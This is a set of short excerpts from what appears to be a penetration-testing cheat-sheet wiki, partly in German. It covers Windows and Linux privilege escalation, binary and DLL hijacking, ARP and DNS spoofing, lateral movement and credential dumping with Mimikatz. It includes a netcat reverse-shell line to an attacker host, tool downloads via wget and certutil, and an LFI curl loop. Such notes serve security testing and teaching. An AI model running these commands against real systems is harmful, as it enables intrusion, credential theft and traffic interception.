-
Enumeration In PowerShell Caution: This command works via RDP in an interactive session, but NOT in a non-privileged bind/winrm shell. All services: PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName All running services: PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}PS> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}…
-
Compile it natively or not: x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll Restart the service / application somehow and check if there is a new admin2 alive. Reflective DLL Injection See https://github.com/stephenfewer/ReflectiveDLLInjection
-
Binary hijacking Check if a binary (e.g. from a service) is writeable: PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F) NT AUTHORITY\SYSTEM:(F) BUILTIN\Users:(F) NT AUTHORITY\Authenticated Users:(RX) Legend: If yes, replace it with a more useful executeable, like this one. Compile this for the correct target architecture and replace the original file. x86_64-w64-mingw32-gcc adduser.c -o adduser.exe Check this with one command:
-
A Ettercap successor, written in Go. Basic commands: Passive ARP probing: net.recon on net.recon off Active probing: net.probe on net.probe off Sniffing: set net.sniff.output /tmp/sniff.pcap // optional net.sniff on net.sniff off Spoofing: set arp.spoof.targets $target1, $target2, $target3 arp.spoof on arp.spoof off DNS Spoofing: set dns.spoof.domains target.domain // the domain which should be resolved as… set…
-
Various Show who else is logged in. qwinsta Open the Event Viewer and search in the looks. Have fun! Network enumeration Show the network configuration. Are there multiple interfaces? ipconfig /all Routing information route print Show current network connections. After checking this command: CHECK all ports with the previous found ones! netstat -ano Check the ARP cache…
-
Prepare the own system: cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80 Prepare the target: cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script Now, execute it: LinPeas: ./linpeas.sh LinEnum: ./LinEnum.sh linux-smart-enumeration: ./lse.sh ‑l1 linux-exploit-suggester‑2: ./linux-exploit-suggester‑2.pl sudo-killer: ./SUDO_KILLERv2.0.5.sh linuxprivchecker: ./linuxprivchecker.py Finally: Copy typescript file to the PentestManager!
-
Additional ideas Environment exploitation Interpolation exploitation Prerequisites: Then, create a file in a directory which is names like parameters from the program. The program will interpret the filenames as arguments. Example: Assume there is a call like this in a script: tar czf /tmp/backup.tar.gz * The script is in /home/peter and because we are this…
-
If your console is narrow, widen it at the beginning: stty rows 50 cols 200 Consider to directly spawn another reverse shell: nc -e /bin/sh $attackerip 4444 & Basic enumeration about the host idgroupscat /etc/passwdcat /etc/groupcat /etc/hostscat /etc/fstabuname -a // Check for kernel exploits // ALSO search for kernel exploits with OS name! // If this…
-
Execution If you cannot execute an exe file, try these options: Windows firewall / netsh Check firewall state netsh advfirewall show currentprofile netsh advfirewall show state If the firewall is active, list the configuration: netsh advfirewall show config Example how to add exceptions into the firewall via the command line from an administrator: C:\Windows\temp> netsh advfirewall firewall…
-
Prepare the own system: cd p151.general.1/scripts/privesc/windows python -m SimpleHTTPServer 80 Prepare the target: set NTPSRV=$ownIp mkdir C:\Windows\System32\spool\drivers\color\wsc cd C:\Windows\System32\spool\drivers\color\wsc Download most scripts at once (>30 MB!): certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip 7za.exe x _ex.zip WinPeas Github winPEAS.batwinPEASx86.exewinPEASx64.exe Powerless Github certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat Powerless.bat Windows Exploit Suggester NG Github…
-
This site contains links to tools / techniques which can run in the background during an engagement. Linux Windows
-
With username/password With psexec (Prerequisites: ADMIN$ share is available, the user is part of the local administrator group on the target) With psexec via Metasploit use exploit/windows/smb/psexec With atexec (Impacket) atexec.py dom/user:pass@$target cmd.exe With wmiexec wmiexec.py domain.local/$target:$password@$ip With Smbmap smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…
-
Automates Windows enumeration. Github page Usage Seatbelt.exe -group=all Run Seatbelt.exe without arguments to see possible parameters. Example Seatbelt.exe OSInfo Processes Remote From another Windows system, seatbelt can connect to a victim and perform commands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation There are already some groups defined which perform multiple tests at once. Seatbelt.exe -group=system [-computername=...]Seatbelt.exe…
-
For reverse engineering Devicename Content /proc/$pid/maps Shows the mempory mapping of a process. Includes all used libraries. /proc/self/loginuid Own UID. Read processes If you can read /proc via a LFI: #!/bin/bash for i in {1..1024} do echo $i curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i done The, look in the /tmp/proc directory for files > 0 byte. Read environment of…
-
Try this ressources if you can access files, but not listing them. http://pwnwiki.io/#!presence/windows/blind.md Cheat sheet 1 List In Apache and probably more systems you can “travel over” non-existing files because the path is shortened before checking the existence of a file. Example: /test/test.txt/../../index.html will return in an Apache the root’s index.html even if the test direcory and…
-
Windows creates and stores credentials in the Local Security Authority Subsystem Service LSASS in the memory. On the filesystem, the sam database stores the hashes. Use Mimikatz Usage Enable debug mode. This usess the SeDebugPrivilege so that we are able to communicate with other processes. privilege:debug Try to elevate privileges to obtain SYSTEM user privileges:…
-
Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also localy. Maybe he/she has already administrative privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) information like full names, group memberships, etc.…
-
Collection of privsec scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enumerates all users. Get-NetUser Enumerate all users which does not require Kerberos preauth. Get-NetUser -PreauthNotRequired Returns…
-
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterix require a high-integrity Empire Agent. To upgrade one…
-
See the Impacket site for a short description of all tools. Tip: On Kali, use the command impacket-* Enumeration without authentication Determine the system architecture getArch.py -target $target Returns the listening RPC interface IDs. ifmap.py $target 135rpcdump.py $target Enumeration with half authentication Scenario: You have credentials for one AD user. Then, try to get all users for…
-
Windows clients use SAM files. Windows DC uses ntds.dit to store all hashes from the domain. SAM C:\windows\repair\sam C:\windows\System32\config\SAM C:\windows\System32\config\RegBack\SAM Alternatives in meterpreter: run post/windows/gather/hashdump run post/windows/gather/smart_hashdump run hashdump hashdump (load module before: use priv) creds_all If hashdump doesn’t work: Notes Format Username : UID : LM hash : NTLM hash : : : For hashcat,…
-
1. Manual enumeration id pwd uname -a // are there kernel exploits? cat /etc/hosts cat /etc/passwd ls -lah /etc/passwd cat /etc/group cat /etc/fstab cat /etc/crontab df cd /home && ls ... // or execute ls -lahR /home/ cd /root && ls ... netstat -antup ps aux sudo -l su // if passwords are already known…
-
Enumeration Aktuell angemeldete Benutzer anzeigen finger @ip Benutzer-Enumeration for username in $(cat cirt-default-usernames.txt); do finger $username@10.10.10.76 >> /tmp/finger; done Enumeration mit Metasploit: msf5 > use auxiliary/scanner/finger/finger_users msf5 auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76 rhosts => 10.10.10.76 msf5 auxiliary(scanner/finger/finger_users) > run Exploits Auf sehr alten Systemen konnte man https://insecure.org/sploits_all.html zufolge Befehle ausführen, etwa mit finger "|/bin/id@host'
-
Use the bof1_web.py or bof1_socket.py to start. Use bof1_socket_10.py to determine the position of the EIP. Use bof2_socket_20.py with the found EIP offset to verify that the EIP was overwritten with B’s. Use bof3_socket_10.py with the found EIP and find all bad chars. Find with Mona a JMP address. Create payload, add it and €profit. 0. Confirm vulnerability Download…
-
Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…
-
https://github.com/diego-treitos/linux-smart-enumeration This script will show relevant information about the security of the local Linux system. Quick install Details from the manual It has 3 levels of verbosity so you can control how much information you see. In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1)…
-
Like OSXcollector, but for Windows. Collects information on a host for later analyzation. https://www.fireeye.com/services/freeware/redline.html
-
osxcollector http://yelp.github.io/osxcollector/ Stand alone python script. Execute it on a Mac which should be analysed. It creates an archive with “everything” interessting which the victim can hand over an expert. See redline for Windows